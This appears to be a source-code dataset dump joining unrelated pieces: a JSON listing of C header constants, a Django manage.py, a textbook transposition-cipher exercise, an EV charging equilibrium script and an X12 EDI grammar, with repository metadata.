"__DECL_SIMD_sincosf16", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:61:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_XBS5_LP64_OFF64", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:345:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 127 }, { "tag": "const", "name": "_SC_XBS5_ILP32_OFF32", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:341:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 125 }, { "tag": "const", "name": "__DECL_SIMD_sincosf32", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:62:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_XBS5_ILP32_OFFBIG", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:343:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 126 }, { "tag": "const", "name": "__DECL_SIMD_sincosf64", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:63:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_XBS5_LPBIG_OFFBIG", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:347:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 128 }, { "tag": "const", "name": "__DECL_SIMD_sinf64x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:55:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_SHRT_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:315:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 113 }, { "tag": "const", "name": "__DECL_SIMD_sinf128x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:56:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_SHRT_MIN", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:317:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 114 }, { "tag": "const", "name": "__DECL_SIMD_sincos", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:58:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_SCHAR_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:311:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 111 }, { "tag": "const", "name": "__DECL_SIMD_sincosf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:59:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_SCHAR_MIN", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:313:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 112 }, { "tag": "const", "name": "__DECL_SIMD_sinf32", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:51:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_USHRT_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:325:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 118 }, { "tag": "const", "name": "__DECL_SIMD_sinf64", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:52:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_NL_ARGMAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:328:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 119 }, { "tag": "const", "name": "__DECL_SIMD_sinf128", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:53:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_UCHAR_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:319:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 115 }, { "tag": "const", "name": "__DECL_SIMD_sinf32x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:54:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_ULONG_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:323:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 117 }, { "tag": "const", "name": "_SC_UINT_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:321:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 116 }, { "tag": "const", "name": "_CMP_ORD_S", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1583:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 23 }, { "tag": "const", "name": "_CMP_EQ_US", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1584:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 24 }, { "tag": "const", "name": "_MM_FROUND_TRUNC", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:31:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "M_SQRT2", "ns": 0, "location": "/usr/include/math.h:1071:10", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "value": 1.414214e+00 }, { "tag": "const", "name": "_MM_FROUND_RINT", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:32:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "M_SQRT1_2", "ns": 0, "location": "/usr/include/math.h:1072:10", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "value": 7.071068e-01 }, { "tag": "const", "name": "_MM_FROUND_NEARBYINT", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:33:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 12 }, { "tag": "const", "name": "M_2_PI", "ns": 0, "location": "/usr/include/math.h:1069:10", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "value": 6.366198e-01 }, { "tag": "const", "name": "M_1_PI", "ns": 0, "location": "/usr/include/math.h:1068:10", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "value": 3.183099e-01 }, { "tag": "const", "name": "M_2_SQRTPI", "ns": 0, "location": "/usr/include/math.h:1070:10", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "value": 1.128379e+00 }, { "tag": "const", "name": "M_PI_2", "ns": 0, "location": "/usr/include/math.h:1066:10", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "value": 1.570796e+00 }, { "tag": "const", "name": "M_PI_4", "ns": 0, "location": "/usr/include/math.h:1067:10", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "value": 7.853982e-01 }, { "tag": "const", "name": "M_LN2", "ns": 0, "location": "/usr/include/math.h:1063:10", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "value": 6.931472e-01 }, { "tag": "const", "name": "M_PI", "ns": 0, "location": "/usr/include/math.h:1065:10", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "value": 3.141593e+00 }, { "tag": "const", "name": "M_LN10", "ns": 0, "location": "/usr/include/math.h:1064:10", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "value": 2.302585e+00 }, { "tag": "const", "name": "__AVX512ERINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512erintrin.h:14:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "M_LOG2E", "ns": 0, "location": "/usr/include/math.h:1061:10", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "value": 1.442695e+00 }, { "tag": "const", "name": "M_E", "ns": 0, "location": "/usr/include/math.h:1060:10", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "value": 2.718282e+00 }, { "tag": "const", "name": "M_LOG10E", "ns": 0, "location": "/usr/include/math.h:1062:10", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "value": 4.342945e-01 }, { "tag": "const", "name": "math_errhandling", "ns": 0, "location": "/usr/include/math.h:962:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "MATH_ERRNO", "ns": 0, "location": "/usr/include/math.h:949:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "MATH_ERREXCEPT", "ns": 0, "location": "/usr/include/math.h:950:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "FP_NORMAL", "ns": 0, "location": "/usr/include/math.h:868:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "_IO_EOF_SEEN", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h:111:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16 }, { "tag": "const", "name": "FP_ZERO", "ns": 0, "location": "/usr/include/math.h:862:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "_IO_ERR_SEEN", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h:114:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "FP_SUBNORMAL", "ns": 0, "location": "/usr/include/math.h:865:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "FP_NAN", "ns": 0, "location": "/usr/include/math.h:856:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "FP_INFINITE", "ns": 0, "location": "/usr/include/math.h:859:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__HAVE_DISTINCT_FLOAT32", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:53:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__HAVE_DISTINCT_FLOAT64", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:54:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__HAVE_DISTINCT_FLOAT32X", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:55:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__HAVE_FLOAT32", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:35:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__HAVE_FLOAT64", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:36:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__HAVE_FLOAT32X", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:37:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__HAVE_FLOAT128X", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:38:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__HAVE_DISTINCT_FLOAT16", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:52:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__HAVE_FLOAT64X", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn.h:49:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__HAVE_FLOAT64X_LONG_DOUBLE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn.h:55:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_BITS_TYPES___LOCALE_T_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/__locale_t.h:21:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_BITS_FLOATN_COMMON_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:21:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_BITS_TYPES_LOCALE_T_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/locale_t.h:20:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__HAVE_FLOAT16", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:34:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_SC_SYSTEM_DATABASE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:417:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 162 }, { "tag": "const", "name": "_SC_SYSTEM_DATABASE_R", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:419:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 163 }, { "tag": "const", "name": "__HAVE_FLOAT128", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn.h:35:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_SC_TIMEOUTS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:421:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 164 }, { "tag": "const", "name": "__HAVE_DISTINCT_FLOAT128", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn.h:43:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_SC_TYPED_MEMORY_OBJECTS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:423:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 165 }, { "tag": "const", "name": "__FILE_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/FILE.h:2:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__struct_FILE_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h:19:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__CFLOAT32", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:149:12", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__CFLOAT64", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:160:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__CFLOAT32X", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:169:12", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__CFLOAT64X", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:178:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_STRING_H", "ns": 0, "location": "/usr/include/string.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__HAVE_DISTINCT_FLOAT64X", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:56:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__HAVE_DISTINCT_FLOAT128X", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:57:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__HAVE_FLOAT128_UNLIKE_LDBL", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:63:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__HAVE_FLOATN_NOT_TYPEDEF", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:72:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_MM_DENORMALS_ZERO_ON", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4973:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 64 }, { "tag": "const", "name": "_MM_DENORMALS_ZERO_OFF", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4974:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_MM_DENORMALS_ZERO_MASK", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:4976:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 64 }, { "tag": "const", "name": "__PMMINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pmmintrin.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__TMMINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__AVX512VLINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "stdout", "ns": 0, "location": "/usr/include/stdio.h:142:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "stderr", "ns": 0, "location": "/usr/include/stdio.h:143:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } } ]
[ "jeremiah_larocco@fastmail.com" ]
jeremiah_larocco@fastmail.com
bcab80bf8c6ebe62c1d3dfcf1cbbbc056c376ce7
8a32dbf34abdb35d44adb8e9572f448b6c867ffc
/manage.py
9bad028e4349b653c11b4310dd0c30f7dec81901
[ "MIT" ]
permissive
BerryBC/SpyDataWebAppAndAPI
fd93d46a400014ace9e03a13395e813676b1c71c
6dd42a186e6955575fb747f7ff69c5b5a060ca19
refs/heads/master
2020-12-28T05:47:26.252630
2020-06-09T12:27:27
2020-06-09T12:27:27
238,201,590
0
0
null
null
null
null
UTF-8
Python
false
false
639
py
#!/usr/bin/env python """Django's command-line utility for administrative tasks.""" import os import sys def main(): os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'SpyDataWebAppAndAPI.settings') try: from django.core.management import execute_from_command_line except ImportError as exc: raise ImportError( "Couldn't import Django. Are you sure it's installed and " "available on your PYTHONPATH environment variable? Did you " "forget to activate a virtual environment?" ) from exc execute_from_command_line(sys.argv) if __name__ == '__main__': main()
[ "Berry_BC_@163.com" ]
Berry_BC_@163.com
66a46adc198d4c741e35ee27922208a6dc960bf3
5c116e926ef3dc5e61442509b4a88024f208b9f1
/Exercise_Chapter11_SetA.py
61b071fb71e3dcf91b1591d264c4141d5512c441
[]
no_license
EvgenTol/Hacking-Secret-Cipher-With-Python-Book
aecc8b67fb4678d76674f187ebfff22923b82564
2e755bb6a72ac9bc1e90f1c19bffb4c2a76e9940
refs/heads/master
2020-12-30T12:10:40.455624
2017-05-22T08:09:24
2017-05-22T08:09:24
91,503,232
0
0
null
null
null
null
UTF-8
Python
false
false
2,226
py
''' Book: Hacking Secret Ciphers with Python, by Al Sweigart Author: Evgen Tolstykh Page: 152 Chapter: 11 ''' import time , os , sys , Exercise_Chapter8_SetA , Exercise_Chapter9_SetA def main(): inputFile = "Test.encrypted.txt" outputFile = "Test.decrypted.txt" myKey = 10 myMode = "decrypt" # if the input path is not correct, the programm terminates if not os.path.exists(inputFile): print("The file %s does not exist. Quitting..." % (inputFile)) sys.exit() # if the the ouput file already exists, give the user a chance to quit if os.path.exists((outputFile)): print("This will override the file %s. (C)ontiniue or (Q)uit?" %(outputFile)) response = input("> ") if not response.lower().startswith("c"): sys.exit() # read in the message from the input file fileObj = open(inputFile) content = fileObj.read() fileObj.close() print("%sing..." %(myMode.title())) # Measure how long the encryption/decryption takes startTime = time.time() if myMode == "encrypt": translated = Exercise_Chapter8_SetA.encryptMessage(myKey , content) elif myMode == "decrypt": translated = Exercise_Chapter9_SetA.decryptMessage(myKey , content) totalTime = round(time.time() - startTime, 2) print("%sion time: %s seconds" %(myMode.title() , totalTime)) # Write out the translated message to the output file outputFileObj = open(outputFile , "w") outputFileObj.write(translated) outputFileObj.close() print("Done %sing %s (%s characters)." %(myMode.title() , outputFile , len(content))) if __name__ == "__main__": main() ''' Page: 163 Set: A 1) Which is correct: os.exists() or os.path.exists() 1) => os.path.exists() 2) When is the UNIX epoch? 2) => 1.1.1970 What do the following expressions evaluate to? 1) 'Foobar'.startswith('Foo') 1) => True 2) 'Foo'.startswith('Foobar') 2) => False 3) 'Foobar'.startswith('foo') 3) => False 4) => 'bar'.endswith('Foobar') 4) => False 5) 'Foobar'.endswith('bar') 5) => True 6) 'The quick brown fox jumped over the yellow lazy dog.'.title() 6) => "The Quick Brown Fox Jumped Over The Yellow Lazy Dog." '''
[ "e.tolstykh@yahoo.de" ]
e.tolstykh@yahoo.de
c7d207caab2d8049dd46ee2d929fe5d591e46eac
9e5f8a39016ba2fd39a7dd44bd598eb054d01de9
/EV_CS_edit/Equilibrium_with_equality/verify_equilibrium.py
950ec455db0c1a343830ae732fc376502db0bbf7
[]
no_license
kjzlkj/EV_CS
22b3d2541e31d604bcad2ec4cb307c433474a2c4
4cc6171fa5134a464aca0e1426d997e435b89228
refs/heads/main
2023-06-14T00:53:28.591026
2021-07-07T08:01:11
2021-07-07T08:01:11
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,429
py
#!/usr/bin/env python # _*_ coding: utf-8 _*_ # @Time : 2021/3/5 11:09 # @Author : wbw # @Version:V 0.1 # @File : verify_equilibrium.py # @desc : verify the equilibrium of regions import random from EV_Equilibrium import EvEquilibrium import numpy as np from matplotlib import pyplot as plt from config import config evEquilibrium = EvEquilibrium() """验证底层的均衡解是否正确,原理是对于每个区域, 其在均衡状态下发到每个充电站的流量满足:p_j+q_j+d_ij+f_ij相等。 """ if __name__ == "__main__": # 初始化操作, 假设目前有1个公司控制2个充电站 # p_1 = 30 # p_2 = 10 price = [] p_min = 10 p_max = 50 for cs in range(config.cs_num): price.append(random.randint(p_min, p_max)) region_num = config.region_num minimize_res_list = [] vehicle_vector = config.vehicle_vector dist, vehicle_num, region, strategy_vector = evEquilibrium.initiation(region_num, config.cs_num) print("初始化dist集合, 车辆数, agent, 策略向量集合, 价格集合分别为:", dist, vehicle_num, region, strategy_vector, price) # 求得此定价下底层的策略 strategy = evEquilibrium.best_response_simulation(region, dist, vehicle_num, price, minimize_res_list, strategy_vector) for agent in range(config.region_num): print("区域", agent, "的策略:", strategy[agent]) # f_i_1 = 0 # 到充电站1的车流量 # f_i_2 = 0 # 到充电站2的车流量 # f_i_3 = 0 f_i = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] for cs in range(config.cs_num): for item in range(region_num): f_i[cs] = f_i[cs] + vehicle_vector[item] * strategy[item][cs] # f_i_1 = f_i_1 + vehicle_vector[item] * strategy[item] # 所有区域派到充电站1的车辆数量 # f_i_2 = f_i_2 + vehicle_vector[item] * strategy[item] # 所有区域派到充电站2的车辆数量 # f_i_2 = f_i_2 + vehicle_vector[item] * strategy[item] # 下面分别来看均衡下,每个充电站的流量负载情况是否相等 # 对区域4 load = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] for cs in range(config.cs_num): load[cs] = price[cs] + dist[cs][1] + f_i[cs] + vehicle_vector[1] + strategy_vector[1][cs] for cs in range(config.cs_num): print("负载", cs+1, ": ", load[cs])
[ "434966069@qq.com" ]
434966069@qq.com
42836521a575f8c077b4bfebb8d8e2419be572af
62e58c051128baef9452e7e0eb0b5a83367add26
/x12/4051/527004051.py
8c9efc8520e73dc4035dfeae8878f979b3e8fff1
[]
no_license
dougvanhorn/bots-grammars
2eb6c0a6b5231c14a6faf194b932aa614809076c
09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d
refs/heads/master
2021-05-16T12:55:58.022904
2019-05-17T15:22:23
2019-05-17T15:22:23
105,274,633
0
0
null
2017-09-29T13:21:21
2017-09-29T13:21:21
null
UTF-8
Python
false
false
2,610
py
from bots.botsconfig import * from records004051 import recorddefs syntax = { 'version' : '00403', #version of ISA to send 'functionalgroup' : 'MD', } structure = [ {ID: 'ST', MIN: 1, MAX: 1, LEVEL: [ {ID: 'BR', MIN: 1, MAX: 1}, {ID: 'G62', MIN: 0, MAX: 5}, {ID: 'NTE', MIN: 0, MAX: 5}, {ID: 'LM', MIN: 0, MAX: 50, LEVEL: [ {ID: 'LQ', MIN: 1, MAX: 100}, ]}, {ID: 'N1', MIN: 1, MAX: 20, LEVEL: [ {ID: 'N2', MIN: 0, MAX: 2}, {ID: 'N3', MIN: 0, MAX: 2}, {ID: 'N4', MIN: 0, MAX: 1}, {ID: 'G61', MIN: 0, MAX: 5}, ]}, {ID: 'LIN', MIN: 1, MAX: 99999, LEVEL: [ {ID: 'CS', MIN: 0, MAX: 1}, {ID: 'N9', MIN: 0, MAX: 10}, {ID: 'RCD', MIN: 1, MAX: 99999, LEVEL: [ {ID: 'G62', MIN: 0, MAX: 10}, {ID: 'GF', MIN: 0, MAX: 1}, {ID: 'DD', MIN: 0, MAX: 100}, {ID: 'N9', MIN: 0, MAX: 5}, {ID: 'AMT', MIN: 0, MAX: 1}, {ID: 'NTE', MIN: 0, MAX: 5}, {ID: 'G66', MIN: 0, MAX: 5}, {ID: 'LM', MIN: 0, MAX: 25, LEVEL: [ {ID: 'LQ', MIN: 1, MAX: 100}, ]}, {ID: 'CS', MIN: 0, MAX: 99999, LEVEL: [ {ID: 'PO4', MIN: 0, MAX: 1}, {ID: 'N9', MIN: 0, MAX: 5}, {ID: 'G62', MIN: 0, MAX: 5}, {ID: 'G69', MIN: 0, MAX: 5}, {ID: 'LM', MIN: 0, MAX: 25, LEVEL: [ {ID: 'LQ', MIN: 1, MAX: 100}, ]}, ]}, {ID: 'N1', MIN: 0, MAX: 25, LEVEL: [ {ID: 'N2', MIN: 0, MAX: 2}, {ID: 'N3', MIN: 0, MAX: 2}, {ID: 'N4', MIN: 0, MAX: 1}, {ID: 'G61', MIN: 0, MAX: 1}, ]}, {ID: 'REF', MIN: 0, MAX: 99999, LEVEL: [ {ID: 'G62', MIN: 0, MAX: 10}, {ID: 'N9', MIN: 0, MAX: 99999}, {ID: 'N1', MIN: 0, MAX: 1}, {ID: 'LM', MIN: 0, MAX: 50, LEVEL: [ {ID: 'LQ', MIN: 1, MAX: 100}, ]}, ]}, {ID: 'QTY', MIN: 0, MAX: 99999, LEVEL: [ {ID: 'N1', MIN: 0, MAX: 1}, {ID: 'LM', MIN: 0, MAX: 100, LEVEL: [ {ID: 'LQ', MIN: 1, MAX: 100}, ]}, ]}, {ID: 'FA1', MIN: 0, MAX: 99999, LEVEL: [ {ID: 'FA2', MIN: 1, MAX: 99999}, ]}, ]}, ]}, {ID: 'SE', MIN: 1, MAX: 1}, ]} ]
[ "jason.capriotti@gmail.com" ]
jason.capriotti@gmail.com
a12e797795097cab3d075cf3d0e2a595af7d24c8
4fc9cb4cf01e41c4ed3de89f13d213e95c87dd33
/angr/procedures/definitions/win32_tokenbinding.py
c8f0611d8f6b05290788ee3f32ec70edc73bc914
[ "BSD-2-Clause" ]
permissive
mborgerson/angr
ea5daf28576c3d31b542a0e229139ab2494326e9
8296578e92a15584205bfb2f7add13dd0fb36d56
refs/heads/master
2023-07-24T22:41:25.607215
2022-10-19T19:46:12
2022-10-20T18:13:31
227,243,942
1
2
BSD-2-Clause
2021-04-07T22:09:51
2019-12-11T00:47:55
Python
UTF-8
Python
false
false
7,224
py
